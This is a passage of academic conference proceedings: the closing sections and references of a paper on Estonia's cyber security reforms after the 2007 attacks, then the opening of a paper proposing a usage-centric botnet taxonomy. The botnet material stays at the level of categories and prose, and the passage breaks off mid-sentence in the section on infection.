volunteers, whether their potential role is <strong>in</strong> offensive or defensive activities (Ottis, 2009). However, if<br />
proper legal, policy and operational frameworks are <strong>in</strong> place, volunteers can significantly <strong>in</strong>crease<br />
national cyber security capability.<br />
6. Conclusions<br />
While <strong>in</strong> h<strong>in</strong>dsight, the cyber attacks aga<strong>in</strong>st Estonia were not as severe as often referred to, they still<br />
triggered an understand<strong>in</strong>g of threats from cyber space as threats potentially affect<strong>in</strong>g national security<br />
and prompted a wake-up call concern<strong>in</strong>g the risks associated with the “careless use” of digital <strong>in</strong>formation<br />
technologies (e.g., Internet). For <strong>in</strong>stance, the risk posed by politically motivated <strong>in</strong>dividuals should be<br />
regarded as a possible element of a serious threat to cyber security. By review<strong>in</strong>g the strategic, legal and<br />
organisational changes that Estonia has undergone after the 2007 cyber attacks, this paper provides a<br />
concise list of key changes that have taken place on the legislative and adm<strong>in</strong>istrative levels. While this<br />
paper describes some new assets that so far appear to be unique to Estonia, such as the formation of the<br />
Cyber Defence League, it offers several recommendations to national security planners perform<strong>in</strong>g<br />
beyond Estonia’s national boundaries. Many of the aforementioned recommendations are not new; but<br />
they have passed a practical test through the real-life Estonian case study. Accord<strong>in</strong>gly, these<br />
recommendations are more than a set of purely theoretical proposals. Lastly, based on the forego<strong>in</strong>g<br />
analysis, it is important to stress the fact that cyber security of a nation state can only be achieved by an<br />
<strong>in</strong>terlocked approach cover<strong>in</strong>g national policies, its legal framework and organisations <strong>in</strong>volv<strong>in</strong>g both<br />
public and private actors, as well as necessary changes identified by a realistic risk assessment.<br />
Disclaimer<br />
The op<strong>in</strong>ions expressed here are those of the authors and should not be considered as the official policy<br />
of the Cooperative Cyber Defence Centre of Excellence or NATO.<br />
Acknowledgement<br />
We would like Mrs. Kadri Kaska and the unknown reviewer for their substantial comments they provided<br />
us with <strong>in</strong> the course of writ<strong>in</strong>g this paper.<br />
References<br />
Blomfield, A. (2007). Estonia calls for Nato cyber-terrorism strategy. Retrieved from<br />
http://www.telegraph.co.uk/news/worldnews/1551963/Estonia-calls-for-Nato-cyber-terrorism-strategy.html.<br />
Brown, D. (2006) “A Proposal for an International Convention to Regulate the Use of Information Systems <strong>in</strong> Armed<br />
Conflict”, Harvard International Law Journal, 47 (1), 179-221.<br />
CDL. (n.d.). Cyber Defence League. Retrieved from http://www.kaitseliit.ee/<strong>in</strong>dex.php?op=body&cat_id=395.<br />
Council of Europe. (2001). Convention on Cybercrime. Retrieved from<br />
http://conventions.coe.<strong>in</strong>t/treaty/en/treaties/html/185.htm.<br />
Council of Europe. (2005). Council Framework Decision 2005/222/JHA of 24 February 2005 on attacks aga<strong>in</strong>st<br />
<strong>in</strong>formation systems. Official Journal L 69, 67-71.<br />
Denn<strong>in</strong>g, D. E. (2001). Activism, hacktivism, and cyberterrorism: the <strong>in</strong>ternet as a tool for <strong>in</strong>fluenc<strong>in</strong>g foreign policy.<br />
Networks and netwars: The future of terror, crime, and militancy, 239–288.<br />
Ellis, B. (2001) “The International Legal Implications and Limitations of Information Warfare: What Are Our Options?”.<br />
Retrieved Mar. 2, 2011 from http://www.iwar.org.uk/law/resources/iwlaw/Ellis_B_W_01.pdf.<br />
ENISA. (2010). EU Cyber <strong>Security</strong> Exercise ’Cyber Europe 2010’. Retrieved January 31, 2011, from<br />
http://www.enisa.europa.eu/media/press-releases/cyber-europe-20102019-cyber-security-exercise-with-320-<br />
2018<strong>in</strong>cidents2019-successfully-concluded.<br />
Estonian Government. (2007a). Programme of the Coalition for 2007-2011.<br />
Estonian Government. (2007b). Explanatory Memorandum to the Draft Act on the Amendment of the Penal Code<br />
(116 SE) (In Estonian). Retrieved from<br />
http://www.riigikogu.ee/?page=pub_file&op=emspla<strong>in</strong>&content_type=application/msword&u=20090902161440&<br />
63
Christian Czosseck et al.<br />
file_id=198499&file_name=KarS seletuskiri<br />
(167).doc&file_sise=66048&mnsensk=166+SE&etapp=03.12.2007&fd=29.10.2008.<br />
Estonian Government. (2009). Valitsus kiitis heaks küberjulgeoleku strateegia rakendusplaani aastateks 2009–2011.<br />
Retrieved from http://uudisvoog.postimees.ee/?DATE=20090514&ID=204872.<br />
Estonian Government. (2010). Explanatory Memorandum to the Act amend<strong>in</strong>g the Electronic Communications Act<br />
(424 SE) (In Estonian). Retrieved from<br />
http://www.riigikogu.ee/?page=pub_file&op=emspla<strong>in</strong>&content_type=application/msword&file_id=535868&file_n<br />
ame=elektroonilise side muutm<strong>in</strong>e seletuskiri (424).doc&file_size=31650&mnsensk=424+SE&fd=.<br />
Evron, G. (2008). Battl<strong>in</strong>g botnets and onl<strong>in</strong>e mobs: Estonia’s defense efforts dur<strong>in</strong>g the <strong>in</strong>ternet war. Georgetown<br />
Journal of International Affairs, 9(1), 121–126.<br />
Farivar, C. (2009). A Brief Exam<strong>in</strong>ation of Media Coverage of Cyberattacks (2007 - Present). In C. Czosseck & K.<br />
Geers (Eds.), The Virtual Battlefield: Perspectives on Cyber warfare (pp. 182 - 188). IOS Press.<br />
Geers, K. (2010). Live Fire Exercise: Prepar<strong>in</strong>g for Cyber War. Journal of Homeland <strong>Security</strong> and Emergency<br />
Management, 7(1).<br />
Hyac<strong>in</strong>the, B. (2009). Cyber Warriors at War. Xlibris, pp. 82-85.<br />
Hyac<strong>in</strong>the, B. & Fleurant<strong>in</strong>, L. (2007). Initial supports to regulate <strong>in</strong>formation warfare’s potentially lethal <strong>in</strong>formation<br />
technologies and techniques. Proceed<strong>in</strong>gs of the 3 rd International Conference on Information Warfare and<br />
<strong>Security</strong> (pp. 206-207). <strong>Academic</strong> <strong>Conferences</strong> <strong>Limited</strong>.<br />
Kash, W. (2008). Lessons from the cyberattacks on Estonia. Retrieved from http://gcn.com/articles/2008/06/13/laurialmann--lessons-from-the-cyberattacks-on-estonia.aspx.<br />
Kaska, K., Talihärm, A.-M., & Tikk, E. (2010). Build<strong>in</strong>g a Comprehensive Approach to Cyber <strong>Security</strong>. CCD COE<br />
Publications.<br />
Landler, M., & Markoff, J. (2007). In Estonia, what may be the first war <strong>in</strong> cyberspace. The New York Times.<br />
Retrieved from http://www.nytimes.com/2007/05/28/bus<strong>in</strong>ess/worldbus<strong>in</strong>ess/28iht-cyberwar.4.5901141.html.<br />
Lemay, A., Fernandeza, J. M., & Knight, S. (2010). P<strong>in</strong>prick attacks, a lesser <strong>in</strong>cluded case? In C. Czosseck & K.<br />
Pod<strong>in</strong>s (Eds.), Conference on Cyber Conflict Proceed<strong>in</strong>gs (pp. 183 - 194). Tall<strong>in</strong>n: CCD COE Publications.<br />
Liles, S. (2010). Cyber Warfare: As a form of low-<strong>in</strong>tensity conflict and <strong>in</strong>surgency. In C. Czosseck & K. Pod<strong>in</strong>s<br />
(Eds.), Conference on Cyber Conflict Proceed<strong>in</strong>gs (pp. 47 - 57). Tall<strong>in</strong>n: CCD COE Publications.<br />
MoD. (2004). National <strong>Security</strong> Concept of the Republic of Estonia.<br />
MoD. (2008). Cyber <strong>Security</strong> Strategy. Retrieved from<br />
http://www.mod.gov.ee/files/km<strong>in</strong>/img/files/Kuberjulgeoleku_strateegia_2008-2013_ENG.pdf.<br />
MoD. (2010). NATIONAL SECURITY CONCEPT. Retrieved from<br />
http://www.km<strong>in</strong>.ee/files/km<strong>in</strong>/nodes/9470_National_<strong>Security</strong>_Concept_of_Estonia.pdf.<br />
MoEAC. (2006). Estonian Information Society Strategy 2013. Retrieved from<br />
http://www.riso.ee/en/system/files/Estonian Information Society Strategy 2013.pdf.<br />
MoEAC. (2007). Implementation Plan 2007-2008 of the Estonian Information Society Strategy.<br />
MoEAC. (2009). Statute for the Development of National Information System (<strong>in</strong> Estonian). Retrieved from<br />
https://www.riigiteataja.ee/akt/13219897.<br />
MoFA. (2010a). Estonia Supports Council of Europe <strong>in</strong> Fight Aga<strong>in</strong>st Cyber Crime. Retrieved from<br />
http://www.vm.ee/?q=en/node/9315.<br />
MoFA. (2010b). Foreign M<strong>in</strong>ister Paet Invited EU and Southeast Asian Nations to Co-operate <strong>in</strong> Back<strong>in</strong>g Cyber<br />
Defence. Retrieved from http://www.vm.ee/?q=en/node/9512.<br />
MoFA. (2010c). National Experts Shared Cyber <strong>Security</strong> Recommendations with UN Secretary General. Retrieved<br />
from http://www.vm.ee/?q=en/node/9722.<br />
MoI. (2009). Estonian Emergency Act (unofficial translation). Retrieved January 4, 2011, from<br />
http://www.legaltext.ee/et/andmebaas/tekst.asp?loc=text&dok=XXXXX26&keel=en&pg=1&ptyyp=RT&tyyp=X&q<br />
uery=h daolukorra.<br />
MoI. (n.d.). M<strong>in</strong>istry of the Interior, Department of crisis management and rescue policy (<strong>in</strong> Estonian). Retrieved<br />
January 4, 2011, from http://www.sisem<strong>in</strong>isteerium.ee/elutahtsad-valdkonnad-ja-teenused-2.<br />
MoJ. (2010a). Guidel<strong>in</strong>es for Development of Crim<strong>in</strong>al Policy until 2018. Retrieved from<br />
http://www.just.ee/arengusuunad2018.<br />
MoJ. (2010b). Estonian Code of Crim<strong>in</strong>al Procedure (unofficial translation). Retrieved from<br />
http://www.legaltext.ee/text/en/X60027K6.htm.<br />
NATO. (2010). Strategic Concept for the Defence and <strong>Security</strong> of the Members of the NATO. Retrieved December<br />
30, 2010, from http://www.nato.<strong>in</strong>t/cps/en/natolive/official_texts_68580.htm.<br />
Nazario, J. (2007). Estonian DDoS Attacks – A summary to date. Retrieved from<br />
http://asert.arbornetworks.com/2007/05/estonian-ddos-attacks-a-summary-to-date/.<br />
Nazario, J. (2009). Politically Motivated Denial of Service Attacks. In C. Czosseck & K. Geers (Eds.), The Virtual<br />
Battlefield: Perspectives on Cyber Warfare (pp. 163-181). 163-181: IOS Press.<br />
Odrats, I. (Ed.). (2007). Information Technology <strong>in</strong> the Public Adm<strong>in</strong>istration of Estonia Yearbook 2007. M<strong>in</strong>istry of<br />
Economic Affairs and Communication.<br />
Ottis, R. (2008). Analysis of the 2007 Cyber Attacks Aga<strong>in</strong>st Estonia from the Information Warfare Perspective.<br />
Proceed<strong>in</strong>gs of the 7th European Conference on Information Warfare (p. 163). <strong>Academic</strong> <strong>Conferences</strong> <strong>Limited</strong>.<br />
Ottis, R. (2009). Theoretical Model for Creat<strong>in</strong>g a Nation-State Level Offensive Cyber Capability. 8th European<br />
Conference on Information Warfare and <strong>Security</strong> (pp. 177-182). <strong>Academic</strong> Publish<strong>in</strong>g <strong>Limited</strong>.<br />
Tikk, E., Kaska, K., & Vihul, L. (2010). International Cyber Incidents: Legal Considerations (p. 130). Tall<strong>in</strong>n: CCD<br />
COE Publications.<br />
64
An Usage-Centric Botnet Taxonomy<br />
Christian Czosseck and Karlis Pod<strong>in</strong>s<br />
Cooperative Cyber Defence Centre of Excellence, Tall<strong>in</strong>n, Estonia<br />
Christian.Czosseck@ccdcoe.org<br />
Karlis.Pod<strong>in</strong>s@ccdcoe.org<br />
Abstract: Botnets have been a recognized threat to computer security for several years. On the timel<strong>in</strong>e of malware<br />
development, they can be seen as the latest evolutionary step. Crim<strong>in</strong>als have taken advantage of this new technology<br />
and cyber crime has grown to become a serious and sophisticated problem which law enforcement still f<strong>in</strong>ds<br />
difficult to deal with. In the past few years we are witness<strong>in</strong>g a movement away from cyber crime. Nation states become<br />
the target of attacks as well as actively us<strong>in</strong>g botnets to project their own power <strong>in</strong> the political or military doma<strong>in</strong>.<br />
To study the new and emerg<strong>in</strong>g cases of botnet usage we propose an usage-centric botnet taxonomy. Although<br />
there are already a number of botnet taxonomies published, most of them have a technical viewpo<strong>in</strong>t and<br />
often consider cyber crime as the major driver to use botnets. While it may be true for now, we believe that such approach<br />
might not be holistic enough to describe the current and future developments. Besides the trend of specialized<br />
botnets be<strong>in</strong>g developed, the number of botnet users is <strong>in</strong>creas<strong>in</strong>g, with new motivations com<strong>in</strong>g along. The<br />
taxonomy proposed <strong>in</strong> this paper takes a different viewpo<strong>in</strong>t by focus<strong>in</strong>g less on technical attributes than on the actors<br />
us<strong>in</strong>g botnets and the functionality requested by them. Major difference from exist<strong>in</strong>g research is that proposed<br />
taxonomy classifies <strong>in</strong>stances of botnet use. Based on exist<strong>in</strong>g taxonomies, case studies of recent botnet <strong>in</strong>cidents<br />
and cyber warfare doctr<strong>in</strong>es of selected nation-states, we explore theoretical and already seen ways of botnet usage.<br />
We propose new classification of botnets based on their technological attributes, the users and the <strong>in</strong>tended effects<br />
on the target to provide a holistic picture of the current situation. We also test the proposed taxonomy on seven <strong>in</strong>stances<br />
of botnet use.<br />
Keywords: botnets, taxonomy, <strong>in</strong>cident categorization<br />
1. Introduction<br />
Botnets, large numbers of remote controlled computers distributed all over the Internet and centrally controlled<br />
by so-called botmasters, are a persistent and cont<strong>in</strong>uously evolv<strong>in</strong>g threat to the Internet community,<br />
always seem<strong>in</strong>g to be one step ahead of countermeasures and take-down attempts. Over the last<br />
years we have seen more and more sophisticated botnets, improv<strong>in</strong>g <strong>in</strong> multiple aspects like size, resistance<br />
to countermeasures and ways of spread<strong>in</strong>g. A whole underground economy developed around<br />
botnets (Kle<strong>in</strong> et al. 2011). More and more botnets have become a service offered by knowledgeable<br />
malware developers, ready to be rented out to everyone will<strong>in</strong>g to pay (Schwartz 2010; Mills 2009). Besides<br />
technological evolution, the number of players as well as their motivations to use botnets is <strong>in</strong>creas<strong>in</strong>g.<br />
The recent history has witnessed several <strong>in</strong>cidents where botnets were not used for f<strong>in</strong>ancial benefit,<br />
but to deliver a political message, to conduct espionage or as an <strong>in</strong>strument for sabotage. The <strong>in</strong>creas<strong>in</strong>g<br />
diversity of botnet <strong>in</strong>cidents requires for a structured botnet classification.<br />
The usage-centric botnet taxonomy presented <strong>in</strong> this paper is designed to classify botnet events by<br />
means of usage, not botnets per se. By this our approach differs from other published taxonomies on<br />
botnets, which mostly focus on technical aspects.<br />
The rest of this paper is structured as follow<strong>in</strong>g: In section 2 we give an overview on related work of botnet<br />
taxonomies, motivat<strong>in</strong>g the uniqueness of our taxonomy; it will be described <strong>in</strong> the follow<strong>in</strong>g section 3.<br />
We test the performance of the proposed taxonomy <strong>in</strong> Section 4 by categoriz<strong>in</strong>g a selection of recent<br />
botnet <strong>in</strong>cidents accord<strong>in</strong>g to it. F<strong>in</strong>ally the conclusions and a discussion of future work are provided <strong>in</strong><br />
Section 5.<br />
2. Related work<br />
Technical details of botnets and their highly visible functionality like DDoS attacks are well studied <strong>in</strong> scientific<br />
literature. But strategic aspects like motivation are rarely covered. (Weaver et al. 2003) present the<br />
Taxonomy of Computer Worms. They <strong>in</strong>troduced payload and motivation attributes similar to the functionality<br />
and motivation attribute presented <strong>in</strong> this paper’s taxonomy. (Weaver et al. 2003) present a more<br />
f<strong>in</strong>e-gra<strong>in</strong>ed classification <strong>in</strong> their features. On the other hand we separate users from their motivation,<br />
be<strong>in</strong>g comb<strong>in</strong>ed to one <strong>in</strong> (Weaver et al. 2003). They also do not consider self-<strong>in</strong>fection.<br />
Detailed technical-level taxonomy of attacks and thorough literature review of technical-level taxonomies<br />
is given by (Hansman & Hunt 2005).<br />
65
Christian Czosseck and Karlis Pod<strong>in</strong>s<br />
A technical defense-centric taxonomy of computer attacks is given <strong>in</strong> (Killourhy et al. 2004), where the<br />
authors discuss network level attack detection and classification. Several attack types like Denial of Service<br />
and Surveillance/Prob<strong>in</strong>g (corresponds to Information theft <strong>in</strong> the proposed taxonomy) are discussed<br />
<strong>in</strong> (Lippmann et al. 1998). (Distributed) Denial-of-Service (DDoS/DoS) attacks have been studied by (Lau<br />
et. al, Distributed Denial of Service Attacks). (Wun et al. 2007; Asosheh & Ramezani 2008; Wood &<br />
Stankovic 2004) offer taxonomies not limited to DDoS as such but cover<strong>in</strong>g architectural aspects of botnets<br />
like command-and-control structures or spread<strong>in</strong>g strategies. Taxonomies of DoS attacks and countermeasures<br />
aga<strong>in</strong>st them have been presented by (Champagne & Lee 2006; Mirkovic & Reiher 2004). A<br />
more detailed description of botnets <strong>in</strong>ternals <strong>in</strong>clud<strong>in</strong>g a comprehensive list of way how to use botnets<br />
several k<strong>in</strong>ds of botnet usage) is presented by (Bacher et al. 2005; Barford & Yegneswaran 2007)The<br />
fast flux functionality provided by some botnets is covered <strong>in</strong> (Holz et al. 2008) and (Jose Nazario & Holz<br />
2008).<br />
Majority of research has considered botnets as collections of mach<strong>in</strong>es which are <strong>in</strong>fected without the<br />
knowledge or consent of the respective owners (Kle<strong>in</strong> et al. 2011). Recently <strong>in</strong> a small number of politically-ta<strong>in</strong>ted<br />
<strong>in</strong>cidents botnet software has been <strong>in</strong>stalled <strong>in</strong>tentionally by the owners (Ottis 2008; Panda<br />
<strong>Security</strong> 2010).<br />
3. A usage-centric botnet taxonomy<br />
Follow<strong>in</strong>g the criteria for an effective taxonomy as <strong>in</strong>troduced <strong>in</strong> (Killourhy et al. 2004), our taxonomy was<br />
designed to follow the pr<strong>in</strong>ciples of be mutual exclusiveness, exhaustiveness and replicability provid<strong>in</strong>g<br />
an <strong>in</strong>strument to classify botnet <strong>in</strong>cidents of the past but also to deal with upcom<strong>in</strong>g events. It consists of<br />
four features: 1. Users of botnets, 2. Motivations of botnet usage, 3. Functionality applied, and 4. Way of<br />
<strong>in</strong>fection. A complete overview is provided <strong>in</strong> figure 1.<br />
Figure 1: Usage-centric Botnet taxonomy<br />
66
3.1 Users of botnets<br />
Christian Czosseck and Karlis Pod<strong>in</strong>s<br />
Over the past years, develop<strong>in</strong>g and us<strong>in</strong>g botnets have become a profitable bus<strong>in</strong>ess. A well developed<br />
underground economy, provid<strong>in</strong>g botnet technology and services to everyone who pays (Mills 2009). The<br />
easy access to botnets <strong>in</strong>troduces new players and motivations to appear. The first attribute of this taxonomy<br />
covers the user of the botnet and is motivated by a legal viewpo<strong>in</strong>t consider<strong>in</strong>g who could be held<br />
liable for the action done.<br />
Exclusion of middlemen<br />
Over the time it has been witnessed that the underground economy has changed to a new serviceoriented<br />
model, offer<strong>in</strong>g botnets for rent (Schwartz 2010; Mills 2009). This way a third party besides botnet<br />
user and the target gets <strong>in</strong>volved. While these servicemen are important players, our taxonomy focuses<br />
on the perpetrator only. We disregard the <strong>in</strong>volvement of middlemen <strong>in</strong> the <strong>in</strong>cidents, although they<br />
might be held responsible for the damages caused.<br />
Individuals are private persons us<strong>in</strong>g botnets <strong>in</strong>dependently.. This <strong>in</strong>cludes private persons us<strong>in</strong>g botnets<br />
for f<strong>in</strong>ancial ga<strong>in</strong>, education or out of curiosity. But also those, who want to express their op<strong>in</strong>ion with digital<br />
force or support a political or ideological activity e.g. patriotic hack<strong>in</strong>g, as <strong>in</strong> the case of the cyber attacks<br />
aga<strong>in</strong>st Estonia <strong>in</strong> 2007 (Ottis 2008) or participants <strong>in</strong> the Operation Payback (Correll 2010). From<br />
a legal viewpo<strong>in</strong>t, it is the <strong>in</strong>dividual who could be made responsible.<br />
Groups shall cover all forms of collaborative and coord<strong>in</strong>ated, but still loose group of <strong>in</strong>dividuals. It does<br />
not <strong>in</strong>clude groups formed based on a legal person (e.g. a company), and as such leaves only every s<strong>in</strong>gle<br />
<strong>in</strong>dividual as be<strong>in</strong>g responsible for their actions. Persons with different roles might face different consequences,<br />
though. This covers examples where a group of persons were act<strong>in</strong>g as a whole and out of<br />
<strong>in</strong>ternal motivation, as seen to a certa<strong>in</strong> part <strong>in</strong> the Operation Payback <strong>in</strong>cident with regards to the role of<br />
Anonymous (Panda <strong>Security</strong> 2010) and the later founded AnonOps (AnonOps 2010).<br />
Groups also <strong>in</strong>clude examples of organized crime organizations, which do not use a legal body as a facade.<br />
Organizations, <strong>in</strong> contrast to groups, are ma<strong>in</strong>ly def<strong>in</strong>ed by the legal person represent<strong>in</strong>g them. Beside of<br />
the <strong>in</strong>dividuals with<strong>in</strong> the organization (and their personal liability), there is a legal person accord<strong>in</strong>g to<br />
private law, which can be made responsible. This covers all companies us<strong>in</strong>g botnets for e.g. gett<strong>in</strong>g an<br />
(economic) advantage over another party, and to a limited extent on organized crime, if they also use a<br />
legal person for conduction at least parts of their operations. This class shall also <strong>in</strong>clude organizations<br />
established under <strong>in</strong>ternational, private law.<br />
State Actors are the type of users this taxonomy def<strong>in</strong>es, and shall cover all organizations established<br />
under public national or <strong>in</strong>ternational law. These <strong>in</strong>clude esp. parts of the executive power of a state, like<br />
police, military or <strong>in</strong>telligence services.<br />
3.2 Motivations for botnet usage<br />
Botnets are powerful and flexible tools provid<strong>in</strong>g their user with wide variety of functionality. While many<br />
different features of the botnet can be used at the same time, they are connected by the s<strong>in</strong>gle motivation<br />
of the perpetrator at the time of usage. The second attribute provides the follow<strong>in</strong>g broad classes of motivation<br />
beh<strong>in</strong>d botnet usage, which are similar to Motivations and Attackers identified by (Weaver et al.<br />
2003).<br />
Education & Research covers all activities done for the sake of gett<strong>in</strong>g familiar with the botnets, <strong>in</strong>dependently<br />
if one is <strong>in</strong>terested <strong>in</strong> us<strong>in</strong>g, develop<strong>in</strong>g, analyz<strong>in</strong>g or defend<strong>in</strong>g aga<strong>in</strong>st botnets. The key attribute<br />
for this taxon is absence of a clear target e.g. violate somebody’s rights or property.<br />
Seek<strong>in</strong>g F<strong>in</strong>ancial Ga<strong>in</strong> is maybe the most common motivation for us<strong>in</strong>g botnets nowadays. This <strong>in</strong>cludes<br />
most cases of <strong>in</strong>formation theft, like steal<strong>in</strong>g bank or credit cards <strong>in</strong>formation or license keys, as this <strong>in</strong>formation<br />
will be monetized nearly immediately by either us<strong>in</strong>g or sell<strong>in</strong>g it.<br />
Espionage covers all cases where stolen <strong>in</strong>formation is not <strong>in</strong>tended to be turned <strong>in</strong>to money directly or at<br />
all. Instead, the gathered knowledge is used to <strong>in</strong>fluence own decisions, the relationship between parties<br />
67
Christian Czosseck and Karlis Pod<strong>in</strong>s<br />
or to enhance an own situation awareness. This taxon is <strong>in</strong>dependent from the User of the Botnet as def<strong>in</strong>ed<br />
<strong>in</strong> the previous section and as such covers e.g. cases of state spy<strong>in</strong>g or <strong>in</strong>dustrial espionage.<br />
The Manipulation by Send<strong>in</strong>g Data is an umbrella class for all cases of botnet usage, where an outward<br />
directed data flow (from the viewpo<strong>in</strong>t of the <strong>in</strong>fected mach<strong>in</strong>e) is used a) to expression one owns op<strong>in</strong>ion<br />
on someth<strong>in</strong>g; or b) to manipulate someone other’s op<strong>in</strong>ion by send<strong>in</strong>g wrong or mislead<strong>in</strong>g <strong>in</strong>formation.<br />
The first sub-category covers cases like hacktivism (Denn<strong>in</strong>g 2001; Ottis 2008), where groups of persons<br />
use botnets to attack others, e.g. disturb<strong>in</strong>g normal functionality of provided services, to support their political<br />
message. The second sub-attribute covers cases of propaganda or manipulation of services or outcomes<br />
of polls or vot<strong>in</strong>g, lead<strong>in</strong>g to a wrong f<strong>in</strong>al picture for others (Temm<strong>in</strong>gh & Geers 2009a).<br />
On the other hand Manipulation by Filter<strong>in</strong>g Data shall cover all cases where deny<strong>in</strong>g access to <strong>in</strong>formation<br />
is the ma<strong>in</strong> reason for the botnet usage. This covers cases of censorship (see e.g. the Belarus case<br />
<strong>in</strong> Pavlyuchenko 2009), <strong>in</strong>formation blockages or redirection.<br />
Botnets can be used as an <strong>in</strong>strument to Project Power <strong>in</strong> cyber space. To adopt Clausewitz freely, botnets<br />
can be used as a tool to <strong>in</strong>fluence another party's behavior or policy, after non-violent options are<br />
exhausted. This shall <strong>in</strong>clude, but not be limited to cases where botnets became part of military operations<br />
(e.g. the InfoOp aga<strong>in</strong>st Georgia friendly news portals and governmental websites descried <strong>in</strong><br />
J. Nazario, 2009), or could be used to damage another’s economy (Lemay et al. 2010). We also <strong>in</strong>clude<br />
cases of sabotage (like <strong>in</strong> the case of Stuxnet, see Falliere et al. 2010), or blackmail<strong>in</strong>g (Sophos 2006) to<br />
be <strong>in</strong>cluded here. It needs to be stressed here, that this taxon is <strong>in</strong>dependent from the user of botnets<br />
and as such reaches from <strong>in</strong>dividuals to state actors.<br />
To Evade Attribution is one other reason one might want to consider us<strong>in</strong>g botnets. The mostly global<br />
distribution of botnets allows the user to let its victim believe that someone else was beh<strong>in</strong>d the cyber<br />
attack. This can even be extended to the <strong>in</strong>tention to run a false flag operation. While botnets are not the<br />
only possible way to reach this goal, it is for sure a convenient one. As transnational cooperation <strong>in</strong> fight<strong>in</strong>g<br />
cyber crime is still not developed globally, and not all nation states enjoy friendly relationships, disguis<strong>in</strong>g<br />
one real location and identity can be the reason to use botnets. Another scenario <strong>in</strong>cluded is the<br />
(massive, distributed) acquisition of resources. Here the availability of the sheer number of zombies <strong>in</strong> the<br />
botnets, and with it the comb<strong>in</strong>ed CPU process<strong>in</strong>g power or storage capacity is used to set up a distributed<br />
service, there any s<strong>in</strong>gle node does not have enough knowledge so that even if forensically analyzed,<br />
the service as a whole is not endangered or compromised.<br />
3.3 Functionality<br />
The functionality provided by a botnet is highly dependent on the developer of the botnet and can vary<br />
quite significantly between botnets. A fundamental feature of all botnets is the ability to remotely control<br />
computers and the ability to send files to them, e.g. for updat<strong>in</strong>g the bot client later on. On top of this a<br />
variety of different functions has been developed and became part of many botnets, while not all share<br />
always the same features. As of the common update feature, enhanc<strong>in</strong>g a botnet's capabilities later on is<br />
most often possible.<br />
The third attribute of this taxonomy provides a set of generic features botnets might have. It comb<strong>in</strong>es<br />
features already seen <strong>in</strong> botnets over the past years, and also some new ones, the authors believe them<br />
to be reasonable to consider as they might been seen <strong>in</strong> the near future.. While this list has been prepared<br />
with care, based among others on (Weaver et al. 2003; Bacher et al. 2005), this is not claimed to<br />
be complete. The future might show new functionality not thought of till now.<br />
Denial of Service (DoS) is the ability to disrupt the normal functionality of the <strong>in</strong>fected mach<strong>in</strong>e as a<br />
whole. This enables the botnet master to shut down or even damage the <strong>in</strong>fected system, mak<strong>in</strong>g a recovery<br />
at least difficult.<br />
Distributed Denial of Service (DDoS) is a functionality whereby a large number of service requests are<br />
directed to a target system, exhaust<strong>in</strong>g its available resources to especially answer to desired requests.<br />
For these attacks, the number of used botnet clients is the ma<strong>in</strong> criteria for the success of the DDoS,<br />
while is recognized that more sophisticated attack techniques might lead to a lower number of necessary<br />
bots to attack the target.<br />
68
Christian Czosseck and Karlis Pod<strong>in</strong>s<br />
Information theft of data stored or processed on the <strong>in</strong>fected mach<strong>in</strong>e or traffic pass<strong>in</strong>g or reach<strong>in</strong>g it is<br />
another commonly seen functionality of botnets (Kle<strong>in</strong> et al. 2011). This <strong>in</strong>cludes but not limits to the<br />
search for specific files, passwords or other sensitive data stored or typed <strong>in</strong>to the <strong>in</strong>fected workstation,<br />
e.g. bank<strong>in</strong>g credentials.<br />
Upload<strong>in</strong>g data, as the opposite of <strong>in</strong>formation theft, enables the botnet owner to deliver any desired file<br />
onto the <strong>in</strong>fected mach<strong>in</strong>e. A basic implementation of this functionality is most often standard for all botnets,<br />
as it is necessary to update the <strong>in</strong>stalled malware. Beside this, the <strong>in</strong>stallation of additional software,<br />
e.g. further spyware, advertisement add-ons, or Browser Helper Objects is frequently seen (Bacher et al.<br />
2005). In a bigger scale this could be used to implement a regional surveillance system (see e.g. the idea<br />
presented <strong>in</strong> Husted & Myers 2010).<br />
But the botnet owner is not limited to, as he can basically upload any file he wants to the <strong>in</strong>fected mach<strong>in</strong>e,<br />
and as such could e.g. place compromis<strong>in</strong>g or illegal data. Another special case of this taxon is the<br />
use of the botnet as a launch platform for other malware, accelerat<strong>in</strong>g its spread<strong>in</strong>g by magnitude or enables<br />
regional targeted distribution of it like <strong>in</strong> the case of Stuxnet (Falliere et al. 2010).<br />
This also <strong>in</strong>cludes the manipulation of exist<strong>in</strong>g files on the <strong>in</strong>fected system to change their <strong>in</strong>tended functionality.<br />
It is e.g. not uncommon for malware to disable runn<strong>in</strong>g AV software or restrict<strong>in</strong>g access to AV<br />
websites (Porras et al. 2009).<br />
Proxy<strong>in</strong>g is the ability to use the <strong>in</strong>fected clients to execute actions on behalf of the botnet master, without<br />
him be<strong>in</strong>g revealed directly. Known cases are Spam campaigns, where the bots as tasked to send massively<br />
emails to a target group. Us<strong>in</strong>g a limited number of bots to form a proxy cha<strong>in</strong> can provide functionality<br />
similar to anonymization services like the TOR network, where track<strong>in</strong>g traffic routes is close to<br />
impossible. Or they are used to hide the real location of some critical services, like phish<strong>in</strong>g site or C&C<br />
servers, by implement<strong>in</strong>g fast-flux doma<strong>in</strong>s (Jose Nazario & Holz 2008). Another not often seen way of<br />
us<strong>in</strong>g this functionality would be the manipulation of vot<strong>in</strong>g (Temm<strong>in</strong>gh & Geers 2009b) or click-based<br />
(advertisement) services (Bacher et al. 2005).<br />
Distributed resource cluster<strong>in</strong>g is a newly <strong>in</strong>troduced function not commonly used so far. But the authors<br />
believe that there is room for botnet herders to explore this area more. It is understood that all the other<br />
mentioned functions also use resources of the <strong>in</strong>fected mach<strong>in</strong>e to execute the mission they are tasked<br />
with. This taxon of botnet usage assume the botnet herder to comb<strong>in</strong>e the available resources, namely<br />
CPU time or HDD space to build a service like known from the doma<strong>in</strong> of clustered comput<strong>in</strong>g or cloud<br />
comput<strong>in</strong>g. The resource made available this way would enable him e.g. to conduct distributed calculations<br />
which could be useful for password crack<strong>in</strong>g or to set up a distributed storage, where any member<br />
of the botnet holds part of the data the botnet herder wants to store. If designed well he could store huge<br />
amount of data, redundant and segmented <strong>in</strong> the botnet without any s<strong>in</strong>gle bot client hav<strong>in</strong>g enough parts<br />
for reconstruction a complete picture.<br />
3.4 Way of <strong>in</strong>fection<br />
Enforced Infection:<br />
Most botnets usually behave like any other malware try<strong>in</strong>g to <strong>in</strong>fect as many hosts as possible, spread<strong>in</strong>g<br />
autonomously if ordered to do so. Computers are <strong>in</strong>fected and jo<strong>in</strong> botnets without the knowledge or consent<br />
